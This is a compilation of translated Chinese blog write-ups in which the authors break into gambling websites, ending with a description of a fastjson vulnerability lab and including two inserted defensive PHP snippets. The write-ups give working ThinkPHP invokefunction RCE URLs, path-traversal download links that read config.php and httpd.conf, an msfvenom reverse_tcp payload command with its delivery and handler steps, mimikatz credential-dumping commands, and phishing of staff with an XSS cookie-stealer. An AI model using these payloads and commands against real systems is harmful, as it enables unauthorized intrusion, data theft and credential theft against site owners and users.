(3) Horizontal/vertical privilege escalation: after some sites log in, the cookie carries various ids, such as uid=123, groupid=456, telno=135000387465, etc. It is easy to see the meaning of the fields, and after changing the value you will see the data of other users and even administrators; but the cookies here are all session, and the fields with various numbers do not reveal their meaning. Using burp to try different values returns status:N, which also cannot be followed up.
(4) 0 yuan payment: capture the packet at the payment interface, decode the content of the request packet, and find that there is a sign field inside, and the other fields are checked. If the amount is changed, you need to reverse the verification algorithm and then recalculate the sign value. Give up here temporarily. PS: user_id is finally exposed here.

3. Through xray scanning, a resin-viewfile vulnerability was found.
According to the scan prompt, changing the content of file=xxxx can indeed find some files, such as the configuration file below. This vulnerability is similar to SSRF and can traverse intranet files. Then find tools for exploitation on GitHub, and use burp to run the dictionary to exhaust directories and files one by one, but only the following files were found, all regular files and paths, and no expected configuration (such as account) files were found. If you want to traverse the C drive, it seems to be protected. This loophole is temporarily abandoned.

4. As of now, only XSS has been found usable, and it is reflected. You can only find an XSS platform to generate a script tag that steals cookies, embed it into the URL with the XSS vulnerability, and then find the customer service MM and trick her into clicking. As a result, the customer service MM not only did not fall for it, but also sent me a new link to let me try a new site, WTF. Well, try again, so I continued on the new site. After logging in to the new site with an account, I mainly look for pages that interact with the user (many parameters are involved, there is a lot of room for changes, and the chance of vulnerabilities is much greater than for static web pages). I spent a lot of time and checked countless links, and it seemed there was a turning point, as follows: here is a JSON string containing various sensitive data such as account name, phone number, nickname, permissions, etc., and there is a client keyword in the URL. Is this an interface to view user information? Immediately use burp to capture the packet and change the purely numeric parameters in the URL (pure numbers mean indexing and are easy to exhaust). As expected, the information of some registered users was blasted out.

5.
In addition, CORS vulnerabilities (a type of CSRF) were also discovered through xray, and we also need to find ways to trick customer service, administrators or other users on the platform into clicking. We will not go into it here for the time being.

Summary of this spinach site:
1. The user input of the form is strictly restricted, and both SQL injection and XSS are blocked.
2. The resin vulnerability is not painful and cannot get sensitive data.
3. Payment: there is a sign field verification, and the verification algorithm needs to be cracked first.
4. In the end, a page passed a parameter but did not check it. Some user information was blasted out by changing the value of the numeric parameter.
5. Possibly for business reasons, the front-end page has not yet revealed any place to upload files, so it is still impossible to find a way to upload a small shell.

Reference: 1. https://blkstone.github.io/2017/10/30/resin-attack-vectors/ Attack vector collation against Resin services

Reprinted from the original link address: https://www.cnblogs.com/theseventhson/p/13738535.html
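The post above stops at the payment request's sign field because the amount cannot be changed without recomputing it. As an added example (not from the post or the site it describes), here is how a server can make that field hold up: a keyed HMAC over the request fields with a secret that never leaves the server, compared with hash_equals, plus a server-side price lookup so the client's amount is never trusted even when the signature is valid. SERVER_SECRET, the price table and the sample request are constructed for the demonstration.

```php
<?php
// Added example: server-side verification of a payment "sign" field.
// Everything here (secret, price table, request) is constructed sample data.

declare(strict_types=1);

const SERVER_SECRET = 'replace-with-a-random-32-byte-secret';   // hypothetical, server-only

/** Canonical form of the request: sorted key=value pairs, sign itself excluded. */
function canonical_payload(array $params): string
{
    unset($params['sign']);
    ksort($params, SORT_STRING);
    $pairs = [];
    foreach ($params as $k => $v) {
        $pairs[] = rawurlencode((string)$k) . '=' . rawurlencode((string)$v);
    }
    return implode('&', $pairs);
}

/** Keyed signature: without SERVER_SECRET a client cannot produce a valid sign. */
function compute_sign(array $params, string $secret): string
{
    return hash_hmac('sha256', canonical_payload($params), $secret);
}

/**
 * Verify a payment request. Returns null when it is acceptable,
 * otherwise a short reason string.
 * $priceTable maps order_id => amount of record in cents.
 */
function verify_payment(array $params, array $priceTable, string $secret): ?string
{
    if (!isset($params['sign'], $params['order_id'], $params['amount'])) {
        return 'missing fields';
    }
    $expected = compute_sign($params, $secret);
    // Constant-time comparison; a changed amount invalidates the HMAC.
    if (!hash_equals($expected, (string)$params['sign'])) {
        return 'bad signature';
    }
    if (!isset($priceTable[$params['order_id']])) {
        return 'unknown order';
    }
    // Belt and braces: even a correctly signed request is charged the price of record,
    // so a replayed signature from another flow cannot lower the amount.
    if ((int)$params['amount'] !== $priceTable[$params['order_id']]) {
        return 'amount mismatch';
    }
    return null;
}

// Constructed demonstration: a legitimate request, then the same request with amount set to 0.
$prices = ['A1001' => 9900];
$good = ['order_id' => 'A1001', 'amount' => '9900', 'user_id' => '42'];
$good['sign'] = compute_sign($good, SERVER_SECRET);
if (verify_payment($good, $prices, SERVER_SECRET) !== null) {
    throw new RuntimeException('legitimate request should verify');
}

$tampered = $good;
$tampered['amount'] = '0';   // old sign kept, as a packet-editing attempt would do
if (verify_payment($tampered, $prices, SERVER_SECRET) !== 'bad signature') {
    throw new RuntimeException('tampered amount should be rejected');
}
echo "signature checks behave as expected\n";
```

A signature computed with MD5 over the fields plus a key shipped in the client is what the post's "reverse the verification algorithm" refers to; keeping the key server-side removes that option.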
22. Information collection

Just about to start work, someone on Penguin chatted privately and asked me to make a lot of money with him. Sending a group message is fine, but now everyone starts chatting privately. The criminals are so rampant that they can be spoiled. Let's put the JD card aside first. Open the front desk: it is a gambling forum. A random login attempt and the background came out. The website is PHP. I tried the common passwords several times; admin exists, and the password is incorrect. Put it on Yunxi and take a look. Accessing the domain name is very sluggish. Let's look at the ports again: 3306 is open and the host is Windows. After the collection was completed, the framework was not detected, and there was almost no progress. The only breakthrough points were the background and the port.

Log in to the background

3306: try it with a try mentality; nothing unexpected happens, mysql does not come out. Top100 backend blasting tried and failed. I don't have much hope. Look for JS: there may be passwords, sensitive paths, special interfaces, etc., but it is really clean; maybe I didn't look carefully. There was no other breakthrough point, so I could only try blasting the backstage. I took a big dictionary and ran for a long time. Finally, the iron-headed baby is alive. The dictionary used is abbreviation, year, and special characters.

Upload

In the backend forum article management I saw the editor and my eyes lit up in an instant. It allows single and multiple picture uploads; try uploading. Cracked: whitelist restriction. Various truncations and bypasses failed. See which editor it is: search the JS file and find that it is the wangEditor editor. I searched online and found that there seemed to be no vulnerabilities in this editor, and my ideas were exhausted~

The turning point appears

Continue to search. Finding the order details, you can also download the order picture.
Download link: http://www.xxx.com/download.php?filepath=././wwwroot/php/upload/20191115/1605370100637841.jpg

The website path is obtained through the download link. It is guessed that wwwroot is the root directory of the website. Is there arbitrary file download? Try constructing a link:
http://www.xxx.com/download.php?filepath=./././wwwroot/news.php
Nice, Hu Hansan is finally about to turn over. Continue to look for configuration files; generally index.php will include the database configuration file.
http://www.xxx.com/download.php?filepath=./././wwwroot/index.php
Continue to construct and view config.php.
http://www.xxx.com/download.php?filepath=././wwwroot/config.php
Get the account and try to connect. It prompts that there is no permission, ending in failure. It is guessed that there is a firewall, or the database host value is set to local access only. There is no way; continue to browse and try to read the apache configuration file.
http://www.xxx.com/download.php?filepath=./././apache/conf/httpd.conf
Wang Tefa! HTML files can be executed as PHP files. Go back and try uploading the file with the suffix modified. Both upload points failed~ Continue to search and find an avatar upload in member management. Modify the file name and upload; the response returns the upload path. Construct the download link; the file downloads successfully, which proves it exists.
http://www.xxx.com/download.php?filepath=././wwwroot/php/upload/20201115/1805872100098841.html
Splice the access path; successfully parsed.
http://www.xxx.com/php/upload/2020xxxx/1805872100098841.html
Excited, hands trembling, successful getshell.

Suha: tried privilege escalation and checked the patch status. There were many updates, but there are always fish that slip through the net. Use the tool, search directly for missing patches, EXP attack, privilege escalation succeeded, and administrator permission obtained. Continue with the reverse shell.
After all, using the terminal is uncomfortable, so use MSF to get a reverse shell here.
1. First, use msf to generate a Trojan file locally and specify the payload:
msfvenom -p windows/x64/meterpreter_reverse_tcp lhost=xx.xx.xx.xx lport=4444 -f exe -o achess.exe
2. Open a python server locally on port 8000:
python -m http.server 8000
3. Place the file in the python server and check that it is enabled. Download the exe file on the target machine in the terminal:
echo open server ip:8000 exe file.
4. Use reverse_tcp in msf to enable listening:
handler -p windows/meterpreter_reverse_tcp -H ip -P 4444
5. Execute the exe file and successfully receive the shell.

Don't take it lightly when you get the session. MSF comes with a mimikatz module. The mimikatz module in MSF supports both 32-bit and 64-bit systems, but this module loads the 32-bit version by default. Therefore, if the target host is a 64-bit system, directly loading the module will cause many functions to be unusable. So, on a 64-bit system, you must first view the system process list, and then migrate the meterpreter process to a 64-bit program process to load mimikatz and view the system plaintext, which also prevents the session from being interrupted.

ps: check the processes and find a stable process for migration.
migrate pid
Migrate the meterpreter process to process 408:
migrate 408
Migrated successfully; everything was there, but the password was missing. So, use the mimikatz module in MSF to grab the password.
First load the mimikatz module. The usage of the mimikatz_command module is listed here:
meterpreter > mimikatz_command -f a:  (enter an incorrect module to list all modules)
meterpreter > mimikatz_command -f samdump:  (lists the samdump subcommands)
meterpreter > mimikatz_command -f samdump:hases
meterpreter > mimikatz_command -f handle:list  (list application processes)
meterpreter > mimikatz_command -f service:list  (list services)
meterpreter > mimikatz_command -f sekurlsa:searchPasswords
meterpreter > run post/windows/gather/smart_hashdump  (get hashes)

Select the samdump module, which has two functions:
mimikatz_command -f samdump:hases
mimikatz_command -f samdump:bootkey
But this catches the hash value of the password. I want to see the plaintext password directly, so use the searchPasswords function under the sekurlsa module; execute the following command and successfully grab the password.
mimikatz_command -f sekurlsa:searchPasswords
Finally the 3389 connection was successful and the work was completed. It proves that sometimes it is good to be an iron-headed kid.

Summarize

From Yunxi, fofa, various plugins, subdomain names and port information collection; blasting the background to enter this site (a good dictionary is very important); the editor file upload failed due to whitelist restrictions; finding the editor name and querying editor vulnerabilities was fruitless; finding the function point at the download site, the download link exposes the website path; finding the database configuration file through file download, the connection has no permission; finding the apache configuration file, finding that the file suffix can be bypassed, finding other upload points and successfully getshell; after the privilege escalation, using the mimikatz module in MSF to grab the login password; the remote desktop connection is successful, and the penetration is over.

Reprinted from the original link: https://cloud.tencent.com/developer/article/1790943
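The chain in the post above starts with download.php serving whatever filepath names. As an added example (not code from the post or the forum it describes), this is the shape of a download handler that confines requests to the upload directory: canonicalise with realpath, check containment against the root, and allow only image extensions so that config.php or httpd.conf can never qualify. UPLOAD_ROOT and the allow-list are assumptions; PHP 8 is assumed for str_starts_with.

```php
<?php
// Added example: a path-confined download handler (hardened form of the
// "download.php?filepath=..." endpoint discussed above).
// The vulnerable pattern it replaces is, in effect:
//     readfile($_GET['filepath']);   // serves any file the web user can read

declare(strict_types=1);

const UPLOAD_ROOT = '/var/www/php/upload';           // hypothetical upload directory
const ALLOWED_EXT = ['jpg', 'jpeg', 'png', 'gif'];   // the only types this endpoint serves

/**
 * Map a client-supplied relative path to a canonical file inside $root.
 * Returns the absolute path, or null when the request must be refused.
 */
function resolve_download_path(string $root, string $requested): ?string
{
    // NUL bytes and empty names are never legitimate; refuse before touching the filesystem.
    if ($requested === '' || str_contains($requested, "\0")) {
        return null;
    }
    $rootReal = realpath($root);
    if ($rootReal === false) {
        return null;                       // misconfigured root: fail closed
    }
    // realpath() collapses "../", "./" and symlinks against the real filesystem,
    // so a traversal sequence resolves to wherever it really points.
    $candidate = realpath($rootReal . DIRECTORY_SEPARATOR . $requested);
    if ($candidate === false) {
        return null;                       // does not exist (or not reachable)
    }
    // Containment: the canonical path must remain strictly under the upload root.
    if (!str_starts_with($candidate, $rootReal . DIRECTORY_SEPARATOR)) {
        return null;
    }
    if (!is_file($candidate)) {
        return null;                       // directories are not downloadable
    }
    // Extension allow-list on the canonical name, not on the request string.
    $ext = strtolower(pathinfo($candidate, PATHINFO_EXTENSION));
    if (!in_array($ext, ALLOWED_EXT, true)) {
        return null;
    }
    return $candidate;
}

/** Serve the file, or a generic 404 for anything refused (no hint about why). */
function serve_download(string $root): void
{
    $path = resolve_download_path($root, (string)($_GET['filepath'] ?? ''));
    if ($path === null) {
        http_response_code(404);
        return;
    }
    header('Content-Type: application/octet-stream');
    header('Content-Disposition: attachment; filename="' . basename($path) . '"');
    header('X-Content-Type-Options: nosniff');
    readfile($path);
}

serve_download(UPLOAD_ROOT);
```

The same post's second pivot, .html being handed to the PHP interpreter, is a server-configuration review item rather than a code one: the upload directory should be served with script execution disabled, and httpd.conf should not map non-PHP extensions to the PHP handler.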
23. Today, I suddenly found a spinach site while browsing the web. I won't post a screenshot of the website. It is said that spinach stations are safer and not easy to penetrate, so I did it today when I had nothing to do. As a result, I had just scanned the ports and my IP was banned. This is a bit sad, so I can only hang a proxy and take a look. I browsed and found that this site should not be the main site, but a side station that handles various activities. And I found a surprise in one of the activity pop-up windows: an ID card (SFZ) can be uploaded here; doesn't that mean there may be a file upload vulnerability? When collecting information, I learned that this server is IIS 7.5. Some time ago I was just reviewing and analyzing the vulnerability, so let's try whether it exists. I made the PHP shell into a picture shell for uploading. According to the response, the upload was successful and the address was returned. Next, let's visit it. It can be seen that the parsing was indeed successful, but unfortunately it cannot be used normally. So then directly change the suffix of the PHP big shell to jpg for upload. When I visited again, I found that it could be used normally. When I went in, I saw many people's personal information and transfer screenshots. I have to say that spinach harms people. Since we have a webshell, let's take a look at the current permissions first. It's really hard to deal with; I once again encountered low permissions. Don't consider privilege escalation first; continue to see whether there are any other sensitive documents available. After searching various directories for a long time, I finally found the configuration file of the database, which is displayed as follows. Connect to the database and take a look. Found the account and password of the suspected administrator. I tried it and could decrypt it. I was lucky. Next, log in to the background to take a look. The result was very disappointing.
I originally thought there would be various user information and capital flows. Having reached this point, I can only continue. Just while thinking about how to escalate privileges, sighing that the Spinach Station's reputation is indeed not undeserved, I found the server's information file under a folder. Pay attention to the file name: "Server Information". I was really sleepy and someone gave me a pillow. From this we know that this site is built on Baota (pagoda) and it gave the account and password. How thoughtful. Try logging in and check it out. As shown in the picture, several databases record many sinful money transactions. I won't release the details. On Baota, I also saw that the administrator changed port 3389 to 19283. Combined with the server account and password given in the previous file, log in and take a look. Through some tossing and trying, I found that there are three spinach sites under this server, and their functions are different. One is the main site, one is event handling, and the other is red envelope grabbing. It's really colorful.

Reprinted from the original link: https://www.kngzs.cn/1705.html
  24. I accidentally discovered a ThinkPHP spinach site. Wasn't there a vulnerability in TP recently? Then I tested it casually; the process was not very smooth, but I finally won it, so I posted this article to share my ideas.

0x00 One-click getshell

After a brief look, there should be many people playing with it, right? Just a few days ago I wrote a test tool, so I took it out to test first. The tool shows a vulnerability. One-click getshell, it looks very smooth, haha. But. Xiao Ming shook his hair and found that things were not that simple. When the kitchen knife is connected, a 500 error is returned. We used Firefox's HackBar to verify it. There is nothing wrong with it, so why can't the kitchen knife connect? Being a stingy person, I couldn't help but fall into deep thought.

0x01 Start analysis

Because I wrote this tool myself, I found from the getshell picture above that the third exp is called, so let's analyze it and take a look. PoC as follows:

/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=dir

Let's enter whoami after the PoC to see the permissions.

/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami

IIS permission. However, some commands can be executed, such as echo, dir, etc.

0x02 Try to break through the shell

Since we can execute echo, we can try writing a small shell. If it succeeds, we will use the small shell to upload the big shell. Do it as soon as we say it. When the hard part comes, we have to write it in line by line. Note: symbols in the code should be escaped with ^^. For example, ?php is escaped to ^^?php. After the line-by-line writing is completed, I found that it could not run normally when accessed. I forgot to take a screenshot here. Next, I tried to download the file to the server using the following method and failed. Just when I was about to give up, I remembered that there was still a download command I had not used.
That's certutil.exe. Just do it: put the big shell on our server and enable HFS. Then execute the following command. Successfully got into the big shell, but don't be too happy too early. Xiao Ming shook his hair again and found that things were even more difficult. The big shell can upload files and rename them, etc., but it cannot edit files, cannot view file source code, etc.; clicking shows a blank page. Since that's the case, let's go into the database and take a look. We all know that the database configuration file of TP is in the following location:

/application/database.php

The big shell cannot open it, so we can use the TP command execution vulnerability and try to use the type command to read this file.

/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=type c:\www\application\database.php

The attempt to read it with type failed, and then the copy command came to mind. Copy database.php to the web root directory and rename it to 1.txt.

/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=copy c:\www\application\database.php c:\www\public\1.txt

After copying, visit url/1.txt and find that it is empty.

0x03 Successful breakthrough

After experiencing a series of failures, I calmed down and thought: we can also try to read the source code using file_path. Use the big shell to upload this file to the root directory, then access it, and successfully obtain the database configuration information. Then fill in the configuration information and enter the database. It was already late at night when this article was written. I looked at the instant noodles I had half eaten on the table, finally drank two sips of soup, turned off the phone, and went to bed.

Reprinted from the original link: https://www.jianshu.com/p/1f9b02780f1c
  25. fastjson full-version Docker vulnerability environment (covers versions 1.2.47/1.2.68/1.2.80, etc.), mainly including JNDI injection, WAF bypass, file reading and writing, deserialization, chain detection bypass, and exploitation without outbound network access. The scenario is set as a black-box test, covering the entire process of deep exploitation of fastjson from a black-box perspective; some environments need to be analyzed by decompiling the jar package.

Docker environment:

docker compose up -d

If docker pull is slow, please try using a domestic mirror: https://www.runoob.com/docker/docker-mirror-acceleration.html

After the environment is started, access port 80 of the corresponding IP.

Summary of some common vulnerability exploits for fastjson, which can be used together with: "Fastjson full version detection and utilization - Poc"

Please destroy the environment after use, otherwise it may conflict:

docker compose down

Order of the ranges (divided into three categories according to exploitation characteristics):

FastJson 1.2.47
1247-jndi
1247-jndi-waf
1247-waf-c3p0
1245-jdk8u342

FastJson 1.2.68
1268-readfile
1268-jkd11-writefile
1268-jdk8-writefile
1268-writefile-jsp
1268-writefile-no-network
1268-jdbc

The 1268 write-file ranges have a separate article, which can be used in conjunction with: "FastJson1268 write file RCE research"

FastJson 1.2.80
1280-groovy
1283-serialize

There is a flag file hidden in the root directory of each machine; try to get it! Some environments have not been released yet and are planned for release in a while. You are also welcome to submit your write-ups and suggestions.

Docker environment: https://github.com/lemono0/FastJsonParty
